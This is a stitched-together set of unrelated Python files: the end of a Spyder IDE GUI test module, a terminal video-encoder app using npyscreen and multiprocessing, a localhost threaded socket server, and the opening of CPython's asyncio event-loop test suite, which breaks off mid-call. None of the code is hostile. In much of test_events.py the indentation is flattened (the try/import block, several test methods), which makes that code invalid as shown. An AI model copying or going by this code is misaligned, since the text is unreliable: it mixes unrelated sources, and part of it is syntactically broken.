    qtbot.wait(2000)
    assert not main_window.tour_dialog.isVisible()

    # Ensure that it opens again with force=True
    main_window.show_tour_message(force=True)
    qtbot.waitUntil(lambda: main_window.tour_dialog.isVisible(), timeout=5000)

    # Run the tour and confirm it's running and the dialog is closed
    qtbot.mouseClick(main_window.tour_dialog.launch_tour_button, Qt.LeftButton)
    qtbot.waitUntil(lambda: main_window.tour.is_running, timeout=9000)
    assert not main_window.tour_dialog.isVisible()
    assert not CONF.get('main', 'show_tour_message')

    # Close the tour
    main_window.tour.close_tour()
    qtbot.waitUntil(lambda: not main_window.tour.is_running, timeout=9000)
    main_window.tour_dialog.hide()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_project
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_update_outline(main_window, qtbot, tmpdir):
    """
    Test that files in the Outline pane are updated at startup and
    after switching projects.
    """
    # Show outline explorer
    outline_explorer = main_window.outlineexplorer
    outline_explorer.toggle_view_action.setChecked(True)

    # Get Python editor trees
    treewidget = outline_explorer.get_widget().treewidget
    editors_py = [
        editor for editor in treewidget.editor_ids.keys()
        if editor.get_language() == 'Python'
    ]

    # Wait a bit for trees to be filled
    qtbot.wait(5000)

    # Assert all Python editors are filled
    assert all(
        [
            len(treewidget.editor_tree_cache[editor.get_id()]) > 0
            for editor in editors_py
        ]
    )

    # Split editor
    editorstack = main_window.editor.get_current_editorstack()
    editorstack.sig_split_vertically.emit()
    qtbot.wait(1000)

    # Select file with no outline in split editorstack
    editorstack = main_window.editor.get_current_editorstack()
    editorstack.set_stack_index(2)
    editor = editorstack.get_current_editor()
    assert osp.splitext(editor.filename)[1] == '.txt'
    assert editor.is_cloned

    # Assert tree is empty (a .txt file has no Python symbols)
    editor_tree = treewidget.current_editor
    tree = treewidget.editor_tree_cache[editor_tree.get_id()]
    assert len(tree) == 0

    # Assert spinner is not shown
    assert not outline_explorer.get_widget()._spinner.isSpinning()

    # Set one file as session without projects
    prev_file = tmpdir.join("foo.py")
    prev_file.write("def zz(x):\n"
                    "    return x**2\n")
    CONF.set('editor', 'filenames', [str(prev_file)])

    # Close project to open that file automatically
    main_window.projects.close_project()

    # Wait a bit for its tree to be filled
    qtbot.wait(1000)

    # Assert the editor was filled
    editor = list(treewidget.editor_ids.keys())[0]
    assert len(treewidget.editor_tree_cache[editor.get_id()]) > 0

    # Remove test file from session so it doesn't leak into other tests
    CONF.set('editor', 'filenames', [])
@pytest.mark.slow
@flaky(max_runs=3)
def test_prevent_closing(main_window, qtbot):
    """
    Check we can bypass prevent closing.

    With ``pdb_prevent_closing`` disabled, a file being debugged can be
    closed without interrupting the debug session.
    """
    code = "print(1 + 6)\nprint(1 + 6)\n"

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)
    code_editor.debugger.toogle_breakpoint(line_number=1)

    # Start debugging
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)

    CONF.set('ipython_console', 'pdb_prevent_closing', False)
    # Check we can close a file we debug if the option is disabled
    assert main_window.editor.get_current_editorstack().close_file()
    # Restore the default setting for subsequent tests
    CONF.set('ipython_console', 'pdb_prevent_closing', True)
    # Check we are still debugging
    assert shell.is_debugging()
@pytest.mark.slow
@flaky(max_runs=3)
def test_continue_first_line(main_window, qtbot):
    """
    Check that, with ``pdb_stop_first_line`` disabled, debugging does not
    stop on the first line and the whole file executes to completion.
    """
    code = "print('a =', 1 + 6)\nprint('b =', 1 + 8)\n"

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(code)

    CONF.set('ipython_console', 'pdb_stop_first_line', False)
    # Start debugging
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)
    # The debugging should finish
    qtbot.waitUntil(lambda: not shell.is_debugging())
    # Restore the default setting for subsequent tests
    CONF.set('ipython_console', 'pdb_stop_first_line', True)

    # Check everything was executed
    qtbot.waitUntil(lambda: "a = 7" in shell._control.toPlainText())
    assert "b = 9" in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_outline_no_init(main_window, qtbot):
    """
    Check the Outline pane shows symbols for a file that lives in a
    directory without an ``__init__.py``.
    """
    # Open file in one of our directories without an __init__ file
    spy_dir = osp.dirname(get_module_path('spyder'))
    main_window.editor.load(osp.join(spy_dir, 'tools', 'rm_whitespace.py'))

    # Show outline explorer
    outline_explorer = main_window.outlineexplorer
    outline_explorer.toggle_view_action.setChecked(True)

    # Wait a bit for trees to be filled
    qtbot.wait(5000)

    # Get tree length
    treewidget = outline_explorer.get_widget().treewidget
    editor_id = list(treewidget.editor_ids.values())[1]

    # Assert symbols in the file are detected and shown
    assert len(treewidget.editor_tree_cache[editor_id]) > 0
@pytest.mark.slow
@flaky(max_runs=3)
def test_pdb_without_comm(main_window, qtbot):
    """Check if pdb works without comm."""
    ipyconsole = main_window.ipyconsole
    shell = ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = ipyconsole.get_focus_widget()
    # Close the kernel-side comm channel, then start the debugger without it
    with qtbot.waitSignal(shell.executed):
        shell.execute("get_ipython().kernel.frontend_comm.close()")
    shell.execute("%debug print()")
    qtbot.waitUntil(
        lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
    # Interact with the plain ipdb prompt directly through key events
    qtbot.keyClicks(control, "print('Two: ' + str(1+1))")
    qtbot.keyClick(control, Qt.Key_Enter)
    qtbot.waitUntil(
        lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
    assert "Two: 2" in control.toPlainText()
    # Press step button and expect a sig_pdb_step signal
    with qtbot.waitSignal(shell.sig_pdb_step):
        main_window.editor.debug_command("step")
    # Stop debugging and expect an executed signal
    with qtbot.waitSignal(shell.executed):
        main_window.editor.stop_debugging()
@pytest.mark.slow
@flaky(max_runs=3)
def test_print_comms(main_window, qtbot):
    """Test warning printed when comms print."""
    # A class whose `shape` property prints: evaluating it through the
    # namespace-view comm call should produce the warning under test.
    # NOTE(review): the indentation inside this literal looks collapsed by
    # extraction — confirm against the original file before relying on it.
    code = ("class Test:\n @property\n def shape(self):"
            "\n print((10,))")
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    control = main_window.ipyconsole.get_focus_widget()
    nsb = main_window.variableexplorer.current_widget()
    # Create some output from spyder call
    with qtbot.waitSignal(shell.executed):
        shell.execute(code)
    # Defining the class alone must not add rows to the variable explorer
    assert nsb.editor.source_model.rowCount() == 0
    with qtbot.waitSignal(shell.executed):
        shell.execute("a = Test()")
    # Wait until the object has appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=EVAL_TIMEOUT)
    # Make sure the warning is printed
    assert ("Output from spyder call 'get_namespace_view':"
            in control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="UTF8 on Windows")
def test_goto_find(main_window, qtbot, tmpdir):
    """Test find goes to the right place."""
    # Use UTF8 only character to make sure positions are respected
    code = "we Weee wee\nWe\n🚫 wee"
    # Expected (selectionStart, selectionEnd) for each of the five matches
    # of the case-insensitive regex "we+" in `code`.
    match_positions = [
        (0, 2),
        (3, 7),
        (8, 11),
        (12, 14),
        (18, 21)
    ]
    subdir = tmpdir.mkdir("find-sub")
    p = subdir.join("find-test.py")
    p.write(code)
    main_window.editor.load(to_text_string(p))
    code_editor = main_window.editor.get_focus_widget()
    # Search only inside the temporary directory
    main_window.explorer.chdir(str(subdir))
    main_window.findinfiles.switch_to_plugin()
    findinfiles = main_window.findinfiles.get_widget()
    findinfiles.set_search_text("we+")
    findinfiles.search_regexp_action.setChecked(True)
    findinfiles.case_action.setChecked(False)
    with qtbot.waitSignal(findinfiles.sig_finished, timeout=SHELL_TIMEOUT):
        findinfiles.find()
    results = findinfiles.result_browser.data
    assert len(results) == 5
    assert len(findinfiles.result_browser.files) == 1
    file_item = list(findinfiles.result_browser.files.values())[0]
    assert file_item.childCount() == 5
    # Activating each result must select exactly the matched span
    for i in range(5):
        item = file_item.child(i)
        findinfiles.result_browser.setCurrentItem(item)
        findinfiles.result_browser.activated(item)
        cursor = code_editor.textCursor()
        position = (cursor.selectionStart(), cursor.selectionEnd())
        assert position == match_positions[i]
# Allow running this test module directly with `python <file>`.
if __name__ == "__main__":
    pytest.main()
|
main.py | import time
import npyscreen
from encode import encode_c480, encode_c720
from multiprocessing import Process, Queue, Manager
PROCESS_NUM = 10
def encode(task_q, messages, id):
    """Worker loop: pull filenames from ``task_q`` and encode each one.

    Runs forever; intended as the target of a multiprocessing.Process.
    Progress is reported through the shared ``messages`` dict under this
    worker's ``id`` key. Each file is converted to 480p then 720p; on a
    conversion failure the worker reports it and waits for the next task.
    """
    while True:
        messages[id] = 'waiting task'
        filename = task_q.get()  # blocks until a task arrives
        # Split off only the FINAL extension so filenames containing dots
        # (e.g. "my.video.mp4") keep their full stem; the original
        # "".join(split('.')[:-1]) silently dropped interior dots.
        stem, sep, ext = filename.rpartition('.')
        if not sep:
            # No extension at all (shouldn't happen: the UI validates);
            # degrade gracefully instead of crashing the worker.
            stem, ext = filename, ''
        fout_480p = stem + "_480p." + ext
        fout_720p = stem + "_720p." + ext
        messages[id] = 'recv file to encode {}'.format(filename)
        time.sleep(0.5)
        messages[id] = 'converting file({}) to 480p...'.format(filename)
        succeed, output = encode_c480(filename, fout_480p)
        if not succeed:
            messages[id] = 'convert 480p failed.'
            time.sleep(5)
            continue
        time.sleep(1)
        messages[id] = 'converting file({}) to 720p...'.format(filename)
        succeed, output = encode_c720(filename, fout_720p)
        if not succeed:
            messages[id] = 'convert 720p failed.'
            time.sleep(5)
            continue
        # Typo fix: was 'Succeess'
        messages[id] = 'Success'
        time.sleep(1)
class VideoEncoderApp(npyscreen.NPSAppManaged):
    """npyscreen application owning the worker pool and shared state."""
    def onStart(self):
        """Create shared queues/dict, the main form, and the worker pool."""
        self.keypress_timeout_default = 1  # poll while_waiting() every tick
        # Manager-backed dict shared with the worker processes for status.
        self.manager = Manager()
        self.messages = self.manager.dict()
        self.task_q = Queue()
        self.msg_q = Queue()  # NOTE(review): never consumed in this file
        self.pool = []
        self.addForm("MAIN", MainForm, name="Video Encoder")
        for i in range(PROCESS_NUM):
            p = Process(target=encode, args=(self.task_q, self.messages, i))
            p.start()
            self.pool.append(p)
    def onCleanExit(self):
        """Notify the user and tear down all worker processes."""
        npyscreen.notify_wait("Goodbye!")
        # terminate all the processes
        for process in self.pool:
            process.terminate()
            # brief pause so terminations don't pile up at once
            time.sleep(0.1)
class MainForm(npyscreen.ActionForm):
    """Main UI form: file picker, status log, and per-worker status lines."""
    def create(self):
        """Build the form's widgets."""
        self.keypress_timeout_default = 1  # poll while_waiting() every tick
        self.process_fields = []
        self.fn = self.add(npyscreen.TitleFilenameCombo, name="filename: ")
        self.status = self.add(npyscreen.MultiLineEdit, value="Welcome! Please choose mp4 or mov file to encode\n", max_height=10, rely=9, editable=False)
        # Pending text to append to the status log on the next UI tick.
        self.stdout = None
        for i in range(PROCESS_NUM):
            process_name = "process {}:".format(i)
            self.process_fields.append(self.add(npyscreen.TitleText, name=process_name, value="initializing", editable=False))
    def while_waiting(self):
        """Refresh worker status lines and flush any pending log text."""
        for i in range(PROCESS_NUM):
            if i in self.parentApp.messages:
                self.process_fields[i].value = self.parentApp.messages[i]
                self.process_fields[i].display()
        if self.stdout is not None:
            self.status.value += self.stdout
            self.stdout = None
            self.status.display()
    def on_cancel(self):
        """Leave the form loop, which exits the application."""
        self.parentApp.setNextForm(None)
    def on_ok(self):
        """Validate the chosen filename and enqueue it for encoding."""
        filename = self.fn.value
        parsed = filename.split('.')
        # Accept only files with an mp4/mov extension.  The two previously
        # duplicated error branches are merged into the single else below.
        if len(parsed) > 1 and parsed[-1] in ('mp4', 'mov'):
            self.parentApp.task_q.put(filename)
            self.stdout = "add file({}) to task queue(current size:{})\n".format(filename, self.parentApp.task_q.qsize())
        else:
            self.stdout = "invalid filename({}). mp4 or mov file required.\n".format(filename)
# Launch the npyscreen TUI; workers are started in VideoEncoderApp.onStart.
if __name__ == "__main__":
    app = VideoEncoderApp()
    app.run()
socket_server.py | import socket
import threading
def process_request(conn, addr):
    """Print everything one client sends, then close the connection.

    Reads in 1 KiB chunks until the peer shuts down its side (recv
    returns b''); ``conn`` is closed by the ``with`` block on exit.
    """
    print("connected client:", addr)
    with conn:
        while chunk := conn.recv(1024):
            print(chunk.decode("utf8"))
if __name__ == "__main__":
    # Threaded TCP server: accept forever on localhost:10001 and hand each
    # connection to a worker thread running process_request.
    with socket.socket() as sock:
        sock.bind(('127.0.0.1', 10001))
        sock.listen(socket.SOMAXCONN)
        while True:
            conn, addr = sock.accept()
            # NOTE(review): threads are neither daemonized nor joined; the
            # worker owns `conn` and closes it when the client disconnects.
            th = threading.Thread(target=process_request, args=(conn, addr))
            th.start()
|
test_events.py | """Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
def tearDownModule():
    # Reset the event loop policy so state does not leak into other test
    # modules run in the same process.
    asyncio.set_event_loop_policy(None)
def broken_unix_getsockname():
    """Return True if the platform is Mac OS 10.4 or older."""
    # AIX is always considered broken for this purpose.
    if sys.platform.startswith("aix"):
        return True
    # Anything that is neither AIX nor macOS is fine.
    if sys.platform != 'darwin':
        return False
    # macOS: broken before 10.5 (Leopard).
    mac_version = tuple(
        int(part) for part in platform.mac_ver()[0].split('.'))
    return mac_version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
    """Duck-typed stand-in exposing the coroutine/generator interface
    (send/throw/close/__await__) without being a real coroutine."""
    def send(self, v):
        pass
    def throw(self, *exc):
        pass
    def close(self):
        pass
    def __await__(self):
        pass
class MyBaseProto(asyncio.Protocol):
    """Stream test protocol tracking its lifecycle via a state string.

    Transitions: INITIAL -> CONNECTED -> (EOF) -> CLOSED; each callback
    asserts it is entered from the expected state.
    """
    # Futures resolved on connection_made / connection_lost when a loop
    # was supplied to __init__; otherwise left as None.
    connected = None
    done = None
    def __init__(self, loop=None):
        self.transport = None
        self.state = 'INITIAL'
        self.nbytes = 0  # total bytes received so far
        if loop is not None:
            self.connected = loop.create_future()
            self.done = loop.create_future()
    def connection_made(self, transport):
        self.transport = transport
        assert self.state == 'INITIAL', self.state
        self.state = 'CONNECTED'
        if self.connected:
            self.connected.set_result(None)
    def data_received(self, data):
        assert self.state == 'CONNECTED', self.state
        self.nbytes += len(data)
    def eof_received(self):
        assert self.state == 'CONNECTED', self.state
        self.state = 'EOF'
    def connection_lost(self, exc):
        # EOF may legitimately be skipped (e.g. abortive close).
        assert self.state in ('CONNECTED', 'EOF'), self.state
        self.state = 'CLOSED'
        if self.done:
            self.done.set_result(None)
class MyProto(MyBaseProto):
    """MyBaseProto that immediately sends a minimal HTTP/1.0 request on
    connect, so the test servers have something to respond to."""
    def connection_made(self, transport):
        super().connection_made(transport)
        transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
    """Datagram test protocol tracking lifecycle state and byte count.

    Transitions: INITIAL -> INITIALIZED -> CLOSED.
    """
    # Future resolved on connection_lost when a loop was supplied.
    done = None
    def __init__(self, loop=None):
        self.state = 'INITIAL'
        self.nbytes = 0  # total payload bytes received
        if loop is not None:
            self.done = loop.create_future()
    def connection_made(self, transport):
        self.transport = transport
        assert self.state == 'INITIAL', self.state
        self.state = 'INITIALIZED'
    def datagram_received(self, data, addr):
        assert self.state == 'INITIALIZED', self.state
        self.nbytes += len(data)
    def error_received(self, exc):
        assert self.state == 'INITIALIZED', self.state
    def connection_lost(self, exc):
        assert self.state == 'INITIALIZED', self.state
        self.state = 'CLOSED'
        if self.done:
            self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
    """Read-pipe test protocol recording its lifecycle as an ordered list,
    so tests can assert the full transition history."""
    # Future resolved on connection_lost when a loop was supplied.
    done = None
    def __init__(self, loop=None):
        self.state = ['INITIAL']
        self.nbytes = 0  # total bytes received
        self.transport = None
        if loop is not None:
            self.done = loop.create_future()
    def connection_made(self, transport):
        self.transport = transport
        assert self.state == ['INITIAL'], self.state
        self.state.append('CONNECTED')
    def data_received(self, data):
        assert self.state == ['INITIAL', 'CONNECTED'], self.state
        self.nbytes += len(data)
    def eof_received(self):
        assert self.state == ['INITIAL', 'CONNECTED'], self.state
        self.state.append('EOF')
    def connection_lost(self, exc):
        if 'EOF' not in self.state:
            self.state.append('EOF')  # It is okay if EOF is missed.
        assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
        self.state.append('CLOSED')
        if self.done:
            self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
    """Write-pipe test protocol: INITIAL -> CONNECTED -> CLOSED.

    BaseProtocol only — write pipes receive no data callbacks.
    """
    # Future resolved on connection_lost when a loop was supplied.
    done = None
    def __init__(self, loop=None):
        self.state = 'INITIAL'
        self.transport = None
        if loop is not None:
            self.done = loop.create_future()
    def connection_made(self, transport):
        self.transport = transport
        assert self.state == 'INITIAL', self.state
        self.state = 'CONNECTED'
    def connection_lost(self, exc):
        assert self.state == 'CONNECTED', self.state
        self.state = 'CLOSED'
        if self.done:
            self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
    """Subprocess test protocol exposing futures/events for each phase of
    the child process's life (connect, per-pipe data, disconnect, exit)."""
    def __init__(self, loop):
        self.state = 'INITIAL'
        self.transport = None
        self.connected = loop.create_future()
        self.completed = loop.create_future()
        # One future per stdio fd (0=stdin, 1=stdout, 2=stderr).
        self.disconnects = {fd: loop.create_future() for fd in range(3)}
        # Accumulated output keyed by fd (stdout/stderr only).
        self.data = {1: b'', 2: b''}
        self.returncode = None
        # Events set when any data arrives on the corresponding fd.
        self.got_data = {1: asyncio.Event(loop=loop),
                         2: asyncio.Event(loop=loop)}
    def connection_made(self, transport):
        self.transport = transport
        assert self.state == 'INITIAL', self.state
        self.state = 'CONNECTED'
        self.connected.set_result(None)
    def connection_lost(self, exc):
        assert self.state == 'CONNECTED', self.state
        self.state = 'CLOSED'
        self.completed.set_result(None)
    def pipe_data_received(self, fd, data):
        assert self.state == 'CONNECTED', self.state
        self.data[fd] += data
        self.got_data[fd].set()
    def pipe_connection_lost(self, fd, exc):
        assert self.state == 'CONNECTED', self.state
        if exc:
            self.disconnects[fd].set_exception(exc)
        else:
            self.disconnects[fd].set_result(exc)
    def process_exited(self):
        assert self.state == 'CONNECTED', self.state
        self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
    def setUp(self):
        """Create the event loop under test and install it."""
        super().setUp()
        self.loop = self.create_event_loop()
        self.set_event_loop(self.loop)
    def tearDown(self):
        # just in case if we have transport close callbacks
        if not self.loop.is_closed():
            test_utils.run_briefly(self.loop)
        self.doCleanups()
        support.gc_collect()
        super().tearDown()
    def test_run_until_complete_nesting(self):
        """run_until_complete() must refuse to nest inside a running loop."""
        async def coro1():
            await asyncio.sleep(0)
        async def coro2():
            self.assertTrue(self.loop.is_running())
            # Nested call: expected to raise, leaving coro1() unawaited.
            self.loop.run_until_complete(coro1())
        with self.assertWarnsRegex(
            RuntimeWarning,
            r"coroutine \S+ was never awaited"
        ):
            self.assertRaises(
                RuntimeError, self.loop.run_until_complete, coro2())
    # Note: because of the default Windows timing granularity of
    # 15.6 msec, we use fairly long sleep times here (~100 msec).
    def test_run_until_complete(self):
        """run_until_complete(sleep(0.1)) takes roughly 0.1 s."""
        t0 = self.loop.time()
        self.loop.run_until_complete(asyncio.sleep(0.1))
        t1 = self.loop.time()
        # Wide upper bound (0.8 s) tolerates slow/loaded CI machines.
        self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
    def test_run_until_complete_stopped(self):
        """Stopping the loop before the awaited future completes raises
        RuntimeError from run_until_complete()."""
        async def cb():
            self.loop.stop()
            await asyncio.sleep(0.1)
        task = cb()
        self.assertRaises(RuntimeError,
                          self.loop.run_until_complete, task)
    def test_call_later(self):
        """call_later() fires the callback after roughly the given delay."""
        results = []
        def callback(arg):
            results.append(arg)
            self.loop.stop()
        self.loop.call_later(0.1, callback, 'hello world')
        t0 = time.monotonic()
        self.loop.run_forever()
        t1 = time.monotonic()
        self.assertEqual(results, ['hello world'])
        # Wide upper bound tolerates slow/loaded CI machines.
        self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
    def test_call_soon(self):
        """call_soon() invokes the callback with its positional args."""
        results = []
        def callback(arg1, arg2):
            results.append((arg1, arg2))
            self.loop.stop()
        self.loop.call_soon(callback, 'hello', 'world')
        self.loop.run_forever()
        self.assertEqual(results, [('hello', 'world')])
    def test_call_soon_threadsafe(self):
        """call_soon_threadsafe() schedules safely from another thread."""
        results = []
        lock = threading.Lock()
        def callback(arg):
            results.append(arg)
            if len(results) >= 2:
                self.loop.stop()
        def run_in_thread():
            self.loop.call_soon_threadsafe(callback, 'hello')
            # Signal the main thread that scheduling happened.
            lock.release()
        lock.acquire()
        t = threading.Thread(target=run_in_thread)
        t.start()
        # Wait for the helper thread to schedule 'hello' before running.
        with lock:
            self.loop.call_soon(callback, 'world')
            self.loop.run_forever()
        t.join()
        self.assertEqual(results, ['hello', 'world'])
    def test_call_soon_threadsafe_same_thread(self):
        """call_soon_threadsafe() also works from the loop's own thread."""
        results = []
        def callback(arg):
            results.append(arg)
            if len(results) >= 2:
                self.loop.stop()
        self.loop.call_soon_threadsafe(callback, 'hello')
        self.loop.call_soon(callback, 'world')
        self.loop.run_forever()
        self.assertEqual(results, ['hello', 'world'])
    def test_run_in_executor(self):
        """run_in_executor() runs the callable in a different thread and
        delivers its return value through the future."""
        def run(arg):
            return (arg, threading.get_ident())
        f2 = self.loop.run_in_executor(None, run, 'yo')
        res, thread_id = self.loop.run_until_complete(f2)
        self.assertEqual(res, 'yo')
        self.assertNotEqual(thread_id, threading.get_ident())
    def test_run_in_executor_cancel(self):
        """A cancelled executor future must not call back into a closed
        loop (neither call_soon nor call_soon_threadsafe)."""
        called = False
        def patched_call_soon(*args):
            nonlocal called
            called = True
        def run():
            time.sleep(0.05)
        f2 = self.loop.run_in_executor(None, run)
        f2.cancel()
        self.loop.close()
        self.loop.call_soon = patched_call_soon
        self.loop.call_soon_threadsafe = patched_call_soon
        # Give the worker thread time to finish; no callback may fire.
        time.sleep(0.4)
        self.assertFalse(called)
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
